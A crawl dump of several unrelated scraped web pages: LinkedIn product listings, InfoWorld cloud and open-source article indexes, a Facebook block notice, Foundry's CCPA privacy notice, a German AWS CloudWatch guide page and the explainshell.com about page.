LightMesh IP Address Management (IPAM) Software ManageEngine OpUtils ManageEngine OpUtils IP Address Management (IPAM) Software Numerus Numerus IP Address Management (IPAM) Software dedicated datacenter proxies dedicated datacenter proxies IP Address Management (IPAM) Software Sign in to see more Show more Show less LinkedIn © 2026 About Accessibility User Agreement Privacy Policy Cookie Policy Copyright Policy Brand Policy Guest Controls Community Guidelines English (English) Language | 2026-01-13T09:29:26 |
https://www.linkedin.com/products/red-sift-hardenize/?trk=products_details_guest_similar_products_section_similar_products_section_product_link_result-card_image-click | ASM | LinkedIn Skip to main content LinkedIn Red Sift in Asan Expand search This button displays the currently selected search type. When expanded it provides a list of search options that will switch the search inputs to match the current selection. Jobs People Learning Clear text Clear text Clear text Clear text Clear text Join now Sign in ASM Network Monitoring Software by Red Sift See who's skilled in this Add as skill Learn more Report this product About Red Sift ASM (Attack Surface Management) continuously discovers, inventories and helps manage your business’s critical external-facing and cloud assets. Complete visibility Get a view into your entire attack surface – including assets you didn't know existed. Fix proactively Be aware of and remediate configuration risks before bad actors can take advantage. Reduce premiums Solve problems before they are visible to your insurer and reduce cyber insurance premiums. This product is intended for Information Technology Officer Chief Technology Officer Director of Information Technology Chief Information Officer Infrastructure Architect Infrastructure Engineer Information Security Analyst Information Security Officer Chief Information Security Officer Media Products media viewer No more previous content Leverage unmanaged attack surface data Identify mismanaged or unmanaged assets that other tools miss. Red Sift ASM continuously scans domains, hostnames, and IP addresses so your data is always fresh. Automated asset inventory Build an inventory of your external-facing and cloud assets without spreadsheets or manual processes. Connect to cloud providers, certificate authorities, registrars, and managed DNS providers to import and monitor all of your assets. Get complete visibility into cloud accounts Integrate with AWS, Google Cloud and Azure out-of-the-box for a more holistic view of the entire attack surface. Information to take action In-depth, real-time data about each asset makes it straightforward to take action as soon as a misconfiguration or unmanaged asset is identified. No more next content Featured customers of ASM DENIC eG Technology, Information and Internet 1,639 followers DigiCert Computer and Network Security 167,016 followers Rakuten Advertising Software Development 61,319 followers Coop Retail 173,677 followers Opera Software Development 60,862 followers Similar products NMS NMS Network Monitoring Software Network Operations Center (NOC) Network Operations Center (NOC) Network Monitoring Software Arbor Sightline Arbor Sightline Network Monitoring Software TEMS™ Suite TEMS™ Suite Network Monitoring Software Progress Flowmon Progress Flowmon Network Monitoring Software ONES (Open Networking Enterprise Suite) ONES (Open Networking Enterprise Suite) Network Monitoring Software Sign in to see more Show more Show less Red Sift products Brand Trust Brand Trust Email Security Software Certificates Certificates Network Monitoring Software OnDMARC OnDMARC Email Security Software Red Sift Red Sift Email Security Software LinkedIn © 2026 About Accessibility User Agreement Privacy Policy Cookie Policy Copyright Policy Brand Policy Guest Controls Community Guidelines English (English) Language | 2026-01-13T09:29:26 |
https://www.infoworld.com/cloud-computing/ | Cloud Computing | InfoWorld Topics Latest Newsletters Resources Buyer’s Guides About About Us Advertise Contact Us Editorial Ethics Policy Foundry Careers Newsletters Contribute to InfoWorld Reprints Policies Terms of Service Privacy Policy Cookie Policy Copyright Notice Member Preferences About AdChoices Your California Privacy Rights Our Network CIO Computerworld CSO Network World More News Features Blogs BrandPosts Events Videos Enterprise Buyer’s Guides Close Analytics Artificial Intelligence Generative AI Careers Cloud Computing Data Management Databases Emerging Technology Technology Industry Security Software Development Microsoft .NET Development Tools Devops Open Source Programming Languages Java JavaScript Python IT Leadership Enterprise Buyer’s Guides Back Close Back Close Popular Topics Artificial Intelligence Cloud Computing Data Management Software Development Search Topics Latest Newsletters Resources Buyer’s Guides About Policies Our Network More Back Topics Analytics Artificial Intelligence Generative AI Careers Cloud Computing Data Management Databases Emerging Technology Technology Industry Security Software Development Microsoft .NET Development Tools Devops Open Source Programming Languages Java JavaScript Python IT Leadership Enterprise Buyer’s Guides Back About About Us Advertise Contact Us Editorial Ethics Policy Foundry Careers Newsletters Contribute to InfoWorld Reprints Back Policies Terms of Service Privacy Policy Cookie Policy Copyright Notice Member Preferences About AdChoices Your California Privacy Rights Back Our Network CIO Computerworld CSO Network World Back More News Features Blogs BrandPosts Events Videos Enterprise Buyer’s Guides Home Cloud Computing Sponsored by KPMG Cloud Computing Cloud Computing | News, how-tos, features, reviews, and videos Explore related topics Cloud Architecture Cloud Management Cloud Storage Cloud-Native Hybrid Cloud IaaS Managed Cloud Services Multicloud PaaS Private Cloud SaaS Latest from today analysis Which development platforms and tools should you learn now? For software developers, choosing which technologies and skills to master next has never been more difficult. Experts offer their recommendations. By Isaac Sacolick Jan 13, 2026 8 mins Development Tools Devops Generative AI analysis Why hybrid cloud is the future of enterprise platforms By David Linthicum Jan 13, 2026 4 mins Artificial Intelligence Cloud Architecture Hybrid Cloud news Oracle unveils Java development plans for 2026 By Paul Krill Jan 12, 2026 3 mins Java Programming Languages Software Development news AI is causing developers to abandon Stack Overflow By Mikael Markander Jan 12, 2026 2 mins Artificial Intelligence Generative AI Software Development opinion Stack thinking: Why a single AI platform won’t cut it By Tom Popomaronis Jan 12, 2026 8 mins Artificial Intelligence Development Tools Software Development news Postman snaps up Fern to reduce developer friction around API documentation and SDKs By Anirban Ghoshal Jan 12, 2026 3 mins APIs Software Development opinion Why ‘boring’ VS Code keeps winning By Matt Asay Jan 12, 2026 7 mins Developer GitHub Visual Studio Code feature How to succeed with AI-powered, low-code and no-code development tools By Bob Violino Jan 12, 2026 9 mins Development Tools Generative AI No Code and Low Code news Visual Studio Code adds support for agent skills By Paul Krill Jan 9, 2026 3 mins Development Tools Integrated Development Environments Visual Studio Code Articles news analysis Snowflake: Latest news and insights Stay up-to-date on how Snowflake and its underlying architecture has changed how cloud developers, data managers and data scientists approach cloud data management and analytics By Dan Muse Jan 9, 2026 5 mins Cloud Architecture Cloud Computing Cloud Management news Snowflake to acquire Observe to boost observability in AIops The acquisition could position Snowflake as a control plane for production AI, giving CIOs visibility across data, models, and infrastructure without the pricing shock of traditional observability stacks, analysts say. By Anirban Ghoshal Jan 9, 2026 3 mins Artificial Intelligence Software Development feature Python starts 2026 with a bang The world’s most popular programming language kicks off the new year with a wicked-fast type checker, a C code generator, and a second chance for the tail-calling interpreter. By Serdar Yegulalp Jan 9, 2026 2 mins Programming Languages Python Software Development news Microsoft open-sources XAML Studio Forthcoming update of the rapid prototyping tool for WinUI developers, now available on GitHub, adds a new Fluent UI design, folder support, and a live properties panel. By Paul Krill Jan 8, 2026 1 min Development Tools Integrated Development Environments Visual Studio analysis What drives your cloud security strategy? As cloud breaches increase, organizations should prioritize skills and training over the latest tech to address the actual root problems. By David Linthicum Jan 6, 2026 5 mins Careers Cloud Security IT Skills and Training news Databricks says its Instructed Retriever offers better AI answers than RAG in the enterprise Databricks says Instructed Retriever outperforms RAG and could move AI pilots to production faster, but analysts warn it could expose data, governance, and budget gaps that CIOs can’t ignore. By Anirban Ghoshal Jan 8, 2026 5 mins Artificial Intelligence Generative AI opinion The hidden devops crisis that AI workloads are about to expose Devops teams that cling to component-level testing and basic monitoring will struggle to keep pace with the data demands of AI. By Joseph Morais Jan 8, 2026 6 mins Artificial Intelligence Devops Generative AI news AI-built Rue language pairs Rust memory safety with ease of use Developed using Anthropic’s Claude AI model, the new language is intended to provide memory safety without garbage collection while being easier to use than Rust and Zig. By Paul Krill Jan 7, 2026 2 mins Generative AI Programming Languages Rust news Microsoft acquires Osmos to ease data engineering bottlenecks in Fabric The acquisition could help enterprises push analytics and AI projects into production faster while acting as the missing autonomy layer that connects Fabric’s recent enhancements into a coherent system. By Anirban Ghoshal Jan 7, 2026 4 mins Analytics Artificial Intelligence Data Engineering opinion What the loom tells us about AI and coding Like the loom, AI may turn the job market upside down. And enable new technologies and jobs that we simply can’t predict. By Nick Hodges Jan 7, 2026 4 mins Developer Engineer Generative AI analysis Generative UI: The AI agent is the front end In a new model for user interfaces, agents paint the screen with interactive UI components on demand. Let’s take a look. By Matthew Tyson Jan 7, 2026 8 mins Development Tools Generative AI Libraries and Frameworks news AI won’t replace human devs for at least 5 years Progress towards full AI-driven coding automation continues, but in steps rather than leaps, giving organizations time to prepare, according to a new study. By Taryn Plumb Jan 7, 2026 7 mins Artificial Intelligence Developer Roles news Automated data poisoning proposed as a solution for AI theft threat For hackers, the stolen data would be useless, but authorized users would have a secret key that filters out the fake information. By Howard Solomon Jan 7, 2026 6 mins Artificial Intelligence Data Privacy Privacy Show more Show less View all Video on demand video How to generate C-like programs with Python You might be familiar with how Python and C can work together, by way of projects like Cython. The new PythoC project has a unique twist on working with both languages: it lets you write type-decorated Python that can generate entire standalone C programs, not just importable Python libraries written in C. This video shows a few basic PythoC functions, from generating a whole program to using some of PythoC’s typing features to provide better memory management than C alone could. Dec 16, 2025 5 mins Python Zed Editor Review: The Rust-Powered IDE That Might Replace VS Code Dec 3, 2025 5 mins Python Python vs. Kotlin Nov 13, 2025 5 mins Python Hands-on with the new sampling profiler in Python 3.15 Nov 6, 2025 6 mins Python See all videos Explore a topic Analytics Artificial Intelligence Careers Data Management Databases Development Tools Devops Emerging Technology Generative AI Java JavaScript Microsoft .NET Open Source Programming Languages View all topics All topics Close Browse all topics and categories below. Analytics Artificial Intelligence Careers Data Management Databases Development Tools Devops Emerging Technology Generative AI Java JavaScript Microsoft .NET Open Source Programming Languages Python Security Software Development Technology Industry Show me more Latest Articles Videos news Ruby 4.0.0 introduces ZJIT compiler, Ruby Box isolation By Paul Krill Jan 6, 2026 3 mins Programming Languages Ruby Software Development news Open WebUI bug turns the ‘free model’ into an enterprise backdoor By Shweta Sharma Jan 6, 2026 3 mins Artificial Intelligence Security Vulnerabilities interview Generative AI and the future of databases By Martin Heller Jan 6, 2026 14 mins Artificial Intelligence Databases Generative AI video How to make local packages universal across Python venvs Nov 4, 2025 4 mins Python video X-ray vision for your async activity in Python 3.14 Oct 21, 2025 4 mins Python video Why it's so hard to redistribute standalone Python apps Oct 17, 2025 5 mins Python About About Us Advertise Contact Us Editorial Ethics Policy Foundry Careers Reprints Newsletters BrandPosts Policies Terms of Service Privacy Policy Cookie Policy Copyright Notice Member Preferences About AdChoices Your California Privacy Rights Privacy Settings Our Network CIO Computerworld CSO Network World Facebook X YouTube Google News LinkedIn © 2026 FoundryCo, Inc. All Rights Reserved. | 2026-01-13T09:29:26 |
https://l.facebook.com/l.php?u=https%3A%2F%2Fwww.instagram.com%2F&h=AT2tAxQf9rQ82FqpMsEsDOIQ_gFlLmpR8GrTVfLAWu8oMxip74MQppxWwGaWuqT0gE8j7Q9-4BjNPumU1yxbTHR_gS0rcpnfju_oMo__8Xg5_tCr3npQ_33Rg9cVsftENQOprzLmd5eO2Mrh | Facebook Facebook 이메일 또는 휴대폰 비밀번호 계정을 잊으셨나요? 새 계정 만들기 일시적으로 차단됨 일시적으로 차단됨 회원님의 이 기능 사용 속도가 너무 빠른 것 같습니다. 이 기능 사용에서 일시적으로 차단되었습니다. Back 한국어 English (US) Tiếng Việt Bahasa Indonesia ภาษาไทย Español 中文(简体) 日本語 Português (Brasil) Français (France) Deutsch 가입하기 로그인 Messenger Facebook Lite 동영상 Meta Pay Meta 스토어 Meta Quest Ray-Ban Meta Meta AI Meta AI 콘텐츠 더 보기 Instagram Threads 투표 정보 센터 개인정보처리방침 개인정보 보호 센터 정보 광고 만들기 페이지 만들기 개발자 채용 정보 쿠키 AdChoices 이용 약관 고객 센터 연락처 업로드 및 비사용자 설정 활동 로그 Meta © 2026 | 2026-01-13T09:29:26 |
https://www.infoworld.com/open-source/ | Open Source | InfoWorld Topics Latest Newsletters Resources Buyer’s Guides About About Us Advertise Contact Us Editorial Ethics Policy Foundry Careers Newsletters Contribute to InfoWorld Reprints Policies Terms of Service Privacy Policy Cookie Policy Copyright Notice Member Preferences About AdChoices Your California Privacy Rights Our Network CIO Computerworld CSO Network World More News Features Blogs BrandPosts Events Videos Enterprise Buyer’s Guides Close Analytics Artificial Intelligence Generative AI Careers Cloud Computing Data Management Databases Emerging Technology Technology Industry Security Software Development Microsoft .NET Development Tools Devops Open Source Programming Languages Java JavaScript Python IT Leadership Enterprise Buyer’s Guides Back Close Back Close Popular Topics Artificial Intelligence Cloud Computing Data Management Software Development Search Topics Latest Newsletters Resources Buyer’s Guides About Policies Our Network More Back Topics Analytics Artificial Intelligence Generative AI Careers Cloud Computing Data Management Databases Emerging Technology Technology Industry Security Software Development Microsoft .NET Development Tools Devops Open Source Programming Languages Java JavaScript Python IT Leadership Enterprise Buyer’s Guides Back About About Us Advertise Contact Us Editorial Ethics Policy Foundry Careers Newsletters Contribute to InfoWorld Reprints Back Policies Terms of Service Privacy Policy Cookie Policy Copyright Notice Member Preferences About AdChoices Your California Privacy Rights Back Our Network CIO Computerworld CSO Network World Back More News Features Blogs BrandPosts Events Videos Enterprise Buyer’s Guides Home Software Development Open Source Open Source Open Source | News, how-tos, features, reviews, and videos Latest from today news Microsoft open-sources XAML Studio Forthcoming update of the rapid prototyping tool for WinUI developers, now available on GitHub, adds a new Fluent UI design, folder support, and a live properties panel. By Paul Krill Jan 8, 2026 1 min Development Tools Integrated Development Environments Visual Studio news It’s everyone but Meta in a new AI standards group By Paul Barker Dec 10, 2025 5 mins Artificial Intelligence Open Source Technology Industry opinion How much will openness matter to AI? By Matt Asay Dec 1, 2025 8 mins Generative AI Open Source Technology Industry news AWS open-sources Agent SOPs to simplify AI agent development By Anirban Ghoshal Nov 24, 2025 3 mins Artificial Intelligence Open Source Software Development news Spam flooding npm registry with token stealers still isn’t under control By Howard Solomon Nov 14, 2025 7 mins Application Security Open Source Security analysis Running managed Ray on Azure Kubernetes Service By Simon Bisson Nov 13, 2025 7 mins Kubernetes Microsoft Azure PyTorch opinion NVIDIA's GTC 2025 A glimpse into our AI-powered future By Raul Leite Nov 7, 2025 7 mins Artificial Intelligence Generative AI Open Source news Malicious npm packages contain Vidar infostealer By Howard Solomon Nov 6, 2025 6 mins Cybercrime Development Tools Malware news Perplexity’s open-source tool to run trillion-parameter models without costly upgrades By Gyana Swain Nov 6, 2025 5 mins Artificial Intelligence Generative AI Open Source Articles news TypeScript rises to the top on GitHub The strongly-typed language recently overtook both JavaScript and Python as the most used language on GitHub, with the rise is attributed to demand for AI-assisted development. By Paul Krill Oct 28, 2025 3 mins JavaScript Python TypeScript analysis Using the SkiaSharp graphics library in .NET Microsoft’s cross-platform .NET takes interesting dependencies, including a fork of Google’s Skia, now to be co-maintained with Uno Platform. By Simon Bisson Oct 23, 2025 8 mins Development Tools Libraries and Frameworks Microsoft .NET analysis Using Valkey on Azure and in .NET Aspire The open source Redis fork is slowly getting support across Microsoft’s various platforms. By Simon Bisson Oct 16, 2025 7 mins Cloud-Native Microsoft .NET Microsoft Azure feature The best Java microframeworks to learn now The Java ecosystem brings you unmatched speed and stability. Here’s our review of seven top-shelf Java microframeworks built for modern, lightweight application development. By Matthew Tyson Oct 15, 2025 14 mins Cloud-Native Java Serverless Computing analysis Unpacking the Microsoft Agent Framework Bringing together two very different ways of building AI applications is a challenging task. Has Microsoft bitten off more than it can chew? By Simon Bisson Oct 9, 2025 8 mins Artificial Intelligence Development Tools Open Source news With Arduino deal, Qualcomm pushes deeper into open-source and edge AI development The chipmaker’s acquisition brings its Dragonwing-powered board and new AppLab development environment to a 33 million–strong open-source community. By Prasanth Aby Thomas Oct 8, 2025 5 mins Engineer Open Source Technology Industry opinion How GitHub won software development Collaborating on code used to be hard. Then Git made branching and merging easy, and GitHub took care of the rest. By Nick Hodges Oct 8, 2025 5 mins Devops Open Source Version Control Systems news JavaFX 25 previews JavaFX controls in title bars Preview feature in latest update of the Java client application platform defines a Stage style that allows applications to place scene graph nodes in the header bar area. By Paul Krill Sep 29, 2025 3 mins Java Libraries and Frameworks Open Source news Open source registries signal shift toward paid models as AI strains infrastructure Eight major foundations warn that the donation-based model for critical infrastructure is breaking down. By Gyana Swain Sep 24, 2025 5 mins Artificial Intelligence Open Source opinion NPM attacks and the security of software supply chains Process improvements and a closer look at funding streams will provide far more protection for the open source software we depend on than isolated guardrails. By Matt Asay Sep 22, 2025 7 mins Cyberattacks Open Source Security Practices opinion Why DocumentDB can be a win for MongoDB If the company can embrace influence rather than control, it has the opportunity to help define the open document standard, which will encourage even more growth in the category. By Matt Asay Sep 1, 2025 8 mins Databases Open Source news MariaDB buys back the company it sold two years ago Acquires SkySQL, returning its DBaaS platform to the product portfolio. By Paul Barker Aug 26, 2025 4 mins Databases Open Source Show more Show less View all Video on demand video How to generate C-like programs with Python You might be familiar with how Python and C can work together, by way of projects like Cython. The new PythoC project has a unique twist on working with both languages: it lets you write type-decorated Python that can generate entire standalone C programs, not just importable Python libraries written in C. This video shows a few basic PythoC functions, from generating a whole program to using some of PythoC’s typing features to provide better memory management than C alone could. Dec 16, 2025 5 mins Python Zed Editor Review: The Rust-Powered IDE That Might Replace VS Code Dec 3, 2025 5 mins Python Python vs. Kotlin Nov 13, 2025 5 mins Python Hands-on with the new sampling profiler in Python 3.15 Nov 6, 2025 6 mins Python See all videos Explore a topic Analytics Artificial Intelligence Careers Cloud Computing Data Management Databases Development Tools Devops Emerging Technology Generative AI Java JavaScript Microsoft .NET Programming Languages View all topics All topics Close Browse all topics and categories below. Analytics Artificial Intelligence Careers Cloud Computing Data Management Databases Development Tools Devops Emerging Technology Generative AI Java JavaScript Microsoft .NET Programming Languages Python Security Software Development Technology Industry Show me more Latest Articles Videos analysis Which development platforms and tools should you learn now? By Isaac Sacolick Jan 13, 2026 8 mins Development Tools Devops Generative AI analysis Why hybrid cloud is the future of enterprise platforms By David Linthicum Jan 13, 2026 4 mins Artificial Intelligence Cloud Architecture Hybrid Cloud news Oracle unveils Java development plans for 2026 By Paul Krill Jan 12, 2026 3 mins Java Programming Languages Software Development video How to make local packages universal across Python venvs Nov 4, 2025 4 mins Python video X-ray vision for your async activity in Python 3.14 Oct 21, 2025 4 mins Python video Why it's so hard to redistribute standalone Python apps Oct 17, 2025 5 mins Python About About Us Advertise Contact Us Editorial Ethics Policy Foundry Careers Reprints Newsletters BrandPosts Policies Terms of Service Privacy Policy Cookie Policy Copyright Notice Member Preferences About AdChoices Your California Privacy Rights Privacy Settings Our Network CIO Computerworld CSO Network World Facebook X YouTube Google News LinkedIn © 2026 FoundryCo, Inc. All Rights Reserved. | 2026-01-13T09:29:26 |
https://foundryco.com/ccpa/ | Your California Privacy Rights Under the CCPA | Foundry Skip to content Search Contact us Translation available Select an experience Japan Global Search for: Search Brands CIO CSO InfoWorld Network World Computerworld Macworld PCWorld Tech Advisor TechHive ChannelWorld Specialty brands CIO100 CSO50 All brands Audiences Artificial intelligence Cloud Security Hardware Software All audiences Solutions Ads Audiences Lead gen Intent data Brand experiences Interactive storytelling Events Partner marketing Content creation Affiliate marketing All solutions Research Technology insights AI Priorities CIO Tech Priorities Cloud Computing Security Priorities State of the CIO Buying process Customer Engagement Role & Influence Partner Marketing All research Resources Resources Tools for marketers Blog Videos Customer stories Developer portal The Intersection newsletter All resources About us Press Awards Work here Privacy / Compliance Licensing About Us Brands CIO CSO InfoWorld Network World Computerworld Macworld PCWorld Tech Advisor TechHive ChannelWorld Specialty brands CIO 100 CSO50 All brands Audiences Artificial intelligence Cloud Security Hardware Software All audiences Solutions Ads Lead gen Intent data Brand experiences Interactive storytelling Events Partner marketing Content creation Affiliate marketing All solutions Research Technology insights AI Priorities CIO Tech Priorities Cloud Computing Security Priorities State of the CIO Buying process Customer Engagement Role & Influence Partner Marketing All research Resources Resources Tools for marketers Blog Videos Customer stories Developer Portal The Intersection newsletter All Resources About us Press Awards Work here Privacy / Compliance Licensing About Us Contact Log in Edition - Select an experience Japan Global Your California Privacy Rights This notice supplements the information contained in the FoundryCo, Inc. (“Foundry” or “we” or “our”) Privacy Policy and applies solely to California consumers, in compliance with the California Consumer Privacy Act of 2018 (“ CCPA ”), as amended by the California Privacy Rights Act of 2020 (“ CPRA ”). The terms “personal data” and “personal information” are used interchangeably. Under Section 1798.140 (v) (1) of the CCPA, personal information is defined as “ information that identifies, relates to, describes, is reasonably capable of being associated with, or could reasonably be linked, directly or indirectly, with a particular consumer or household. Personal information includes, but is not limited to, the following if it identifies, relates to, describes, is reasonably capable of being associated with, or could be reasonably linked, directly or indirectly, with a particular consumer or household .” Under the CCPA, California consumers have the following rights in respect to their personal information: Right to know Right to correct Right to delete Right to opt-out of sale or sharing Right to limit use and disclosure of sensitive personal information Right to non-discrimination Right to know You can request that a business that collects your personal information discloses information about its collection, use, sale, disclosure for business purposes and share of such personal information. Specifically, you can request the following information: the categories of personal information Foundry has collected about you; the specific pieces of personal information Foundry has collected about you; the categories of sources from which your personal information is collected; the business or commercial purpose for collecting or selling or sharing (if applicable) your personal information; the categories of third parties with whom Foundry shares your personal information; and the categories of information Foundry discloses to third parties. More detailed information about the categories, purposes and third parties, as well as how and why we collect your personal information, can be found in Foundry’ Privacy Policy . If you require additional information and/or to exercise your rights under the CCPA to request the categories and specific pieces of personal information Foundry collects, please contact us using the contact details provided below. Right to correct You can request that we correct your personal information that is inaccurate. Upon receiving your request, Foundry will correct your inaccurate personal information. To request correction of your personal information, please contact us using the contact details provided below. Right to delete You can request that we delete any of your personal information that we have collected. Upon your request, Foundry will delete your personal information, and you will not receive any Foundry marketing communications regarding our products, content, or services, unless you subsequently provide your personal information in connection with a new registration or it is otherwise lawfully provided to Foundry. To request that Foundry delete the personal information it has collected from and about you, as described in the Foundry Privacy Policy , please contact us using the contact details provided below. Right to opt-out of sale or sharing You can request a business that sells or shares your personal information to not to sell or share your personal information to third parties, as defined in the CCPA. Under Section 1798.140 (ad) (1) of the CCPA, selling is defined as “ renting, releasing, disclosing, disseminating, making available, transferring, or otherwise communicating orally, in writing, or by electronic or other means, a consumer’s personal information by the business to a third party for monetary or other valuable consideration .” Foundry may sell your personal data, including information collected by cookies, with third parties for the purpose of personalized advertising. Foundry is registered as a data broker under the CCPA. For more information about Foundry’s obligations as a data broker, please visit the data broker registry available here . Under Section 1798.140 (ah) (1) of the CCPA, sharing is defined as “ renting, releasing, disclosing, disseminating, making available, transferring, or otherwise communicating orally, in writing, or by electronic or other means, a consumer’s personal information by the business to a third party for cross-context behavioral advertising, whether or not for monetary or other valuable consideration, including transactions between a business and a third party for cross-context behavioral advertising for the benefit of a business in which no money is exchanged .” Foundry may share your personal information, including information collected by cookies with third parties, for the purpose of personalized advertising. You can opt out of such sharing or selling via our Privacy Settings tab at the bottom of this page or via the following email address at privacy@foundryco.com . For more information about setting your preferences regarding cookies, please see Foundry’s Cookie Policy . We will proceed with your request to opt-out of selling or sharing your personal information within 15 days of receiving your request. Right to limit use and disclosure of sensitive personal information You can request that a business limits the use and disclosure of sensitive personal information collected about you, as defined in the CCPA (for example your social security number, financial account information, precise geolocation data or genetic data). Please note that Foundry does not collect any sensitive personal information. Right to non-discrimination You have the right not to be discriminated against if you choose to exercise any of the above-mentioned rights. We do not offer financial incentives or price or service differences to consumers in exchange for the retention of their personal information. How to submit a request? If you wish to submit a request, please contact us at the following email address privacy@foundryco.com and put “CCPA Request” in the subject line. Should you choose to notify us by postal service, our address is: FoundryCo, Inc. 501 2nd Street, Suite 650 San Francisco California 94107 U.S.A. Please describe your request in sufficient detail that allows us to provide you with the required information and reasonably verify you as the person about whom we collected such personal information. We will disclose and deliver the required information within 45 days of receiving your request. If we require more time (up to 90 days), we will inform you of the reason and extension period in writing (including email). Any disclosure we provide to you only covers the past 12-month period preceding your request. We cannot respond to your request or provide you with the required information if we cannot verify your identity or authority to make such request and/or confirm that the personal information relates to you. Please bear in mind that we have the right to refuse your request including, but not limited to, if requested information is necessary for Foundry to comply with legal obligations, exercise legal claims or rights, or defend legal claims; and/or the information is publicly available information, medical information, consumer credit information or any other type of information exempt from the CCPA. Updates to this notice We reserve the right to amend this notice from time to time as necessary. We will post a notice on this website if there are material changes to this policy, but you should also check this website periodically to review the current policy. An updated version of this notice will be published on our website. This notice was last updated in September 2025. Our brands Solutions Research Resources Events About Newsletter Contact us Work here Sitemap Topics Cookies: First-party & third-party Generative AI sponsorships Intent data IP address intelligence Reverse IP lookup Website visitor tracking Legal Terms of Service Privacy / Compliance Environmental Policy Copyright Notice Licensing CCPA IAB Europe TCF Regions ASEAN Australia & New Zealand Central Europe Germany India Middle East, Turkey, & Africa Nordics Southern Europe Western Europe Facebook Twitter LinkedIn ©2026 FoundryCo, Inc. All Rights Reserved. Privacy Policy Ad Choices Privacy Settings California: Do Not Sell My Information | 2026-01-13T09:29:26 |
https://docs.aws.amazon.com/de_de/AmazonCloudWatch/latest/monitoring/GettingStarted.html | Erste Schritte mit automatischen CloudWatch-Dashboards - Amazon CloudWatch Erste Schritte mit automatischen CloudWatch-Dashboards - Amazon CloudWatch Dokumentation Amazon CloudWatch Benutzer-Leitfaden Die vorliegende Übersetzung wurde maschinell erstellt. Im Falle eines Konflikts oder eines Widerspruchs zwischen dieser übersetzten Fassung und der englischen Fassung (einschließlich infolge von Verzögerungen bei der Übersetzung) ist die englische Fassung maßgeblich. Erste Schritte mit automatischen CloudWatch-Dashboards Die CloudWatch-Startseite zeigt automatisch Metriken über jeden AWS-Service an, den Sie verwenden. Sie können zusätzlich benutzerdefinierte Dashboards erstellen, um Metriken über Ihre benutzerdefinierten Anwendungen anzuzeigen und benutzerdefinierte Sammlungen von Metriken Ihrer Wahl anzuzeigen. Öffnen Sie die CloudWatch-Konsole unter https://console.aws.amazon.com/cloudwatch/ . Die Startseite mit der CloudWatch-Übersicht erscheint. Die Übersicht zeigt die folgenden Elemente, die automatisch aktualisiert werden. Alarme nach AWS-Service sorgt für die Darstellung einer Liste der AWS-Services, die Sie in Ihrem Konto verwenden, zusammen mit dem Status der Alarme in diesen Services. Daneben werden zwei oder vier Alarme in Ihrem Konto dargestellt. Die Anzahl hängt davon ab, wie viele AWS-Services Sie nutzen. Die angezeigten Alarme sind diejenigen im ALARM-Zustand oder diejenigen, die den Zustand zuletzt geändert haben. Diese oberen Bereiche unterstützen Sie dabei, schnell den Zustand der AWS-Services zu beurteilen, indem Sie die Alarmzustände in jedem Service und die Alarme sehen, die den Zustand zuletzt geändert haben. Auf diese Weise können Sie Probleme überwachen und schnell diagnostizieren. Unter diesen Bereichen befindet sich das Standard-Dashboard , sofern vorhanden. Das Standard-Dashboard ist ein benutzerdefiniertes Dashboard, das Sie erstellt und CloudWatch-Default genannt haben. Dies ist ein praktischer Weg für Sie, um Metriken über Ihre eigenen benutzerdefinierten Services oder Anwendungen auf der Übersichtsseite hinzuzufügen oder zusätzliche Schlüsselmetriken aus AWS-Services vorzuziehen, die Sie am häufigsten überwachen möchten. Anmerkung Die automatischen Dashboards auf der CloudWatch-Startseite zeigen nur Informationen aus dem aktuellen Konto an, auch wenn es sich um ein Überwachungskonto handelt, das für die kontoübergreifende Beobachtbarkeit von CloudWatch eingerichtet wurde. Informationen zum Erstellen kontenübergreifender Dashboards finden Sie unter Erstellen Sie ein CloudWatch kontenübergreifendes regionsübergreifendes Dashboard mit dem AWS-Managementkonsole . In dieser Übersicht können Sie sich ein serviceübergreifendes Dashboard mit Metriken aus mehreren AWS-Services anzeigen lassen oder sich auf eine bestimmte Ressourcengruppe oder einen bestimmten AWS-Service konzentrieren. Auf diese Weise können Sie Ihre Ansicht auf eine Teilmenge von Ressourcen einschränken, an denen Sie interessiert sind. Themen Anzeigen des serviceübergreifenden CloudWatch-Dashboards So entfernen Sie einen Service aus der Anzeige im serviceübergreifenden CloudWatch-Dashboard Anzeigen eines CloudWatch-Dashboards für einen einzelnen AWS-Service Anzeigen eines CloudWatch-Dashboards für eine Ressourcengruppe JavaScript ist in Ihrem Browser nicht verfügbar oder deaktiviert. Zur Nutzung der AWS-Dokumentation muss JavaScript aktiviert sein. Weitere Informationen finden auf den Hilfe-Seiten Ihres Browsers. Dokumentkonventionen Dashboards Anzeigen des serviceübergreifenden Dashboards Hat Ihnen diese Seite geholfen? – Ja Vielen Dank, dass Sie uns mitgeteilt haben, dass wir gute Arbeit geleistet haben! Würden Sie sich einen Moment Zeit nehmen, um uns mitzuteilen, was wir richtig gemacht haben, damit wir noch besser werden? Hat Ihnen diese Seite geholfen? – Nein Vielen Dank, dass Sie uns mitgeteilt haben, dass diese Seite überarbeitet werden muss. Es tut uns Leid, dass wir Ihnen nicht weiterhelfen konnten. Würden Sie sich einen Moment Zeit nehmen, um uns mitzuteilen, wie wir die Dokumentation verbessern können? | 2026-01-13T09:29:26 |
https://explainshell.com/about | explainshell.com - about explain shell . com about theme Light Dark Hello, This site contains 29761 parsed manpages from sections 1 and 8 found in Ubuntu's manpage repository . A lot of heuristics were used to extract the arguments of each program, and there are errors here and there, especially in manpages that have a non-standard layout. It is written in Python and uses bashlex , a bit of NLTK (to find the interesting parts of the manpage), a little d3.js (for the connecting lines graphic) and Flask. It is served with uwsgi and nginx. Source code is available on github . My name is Idan Kamara and you can contact me at idan at explainshell dot com for any questions or suggestions. | 2026-01-13T09:29:26 |
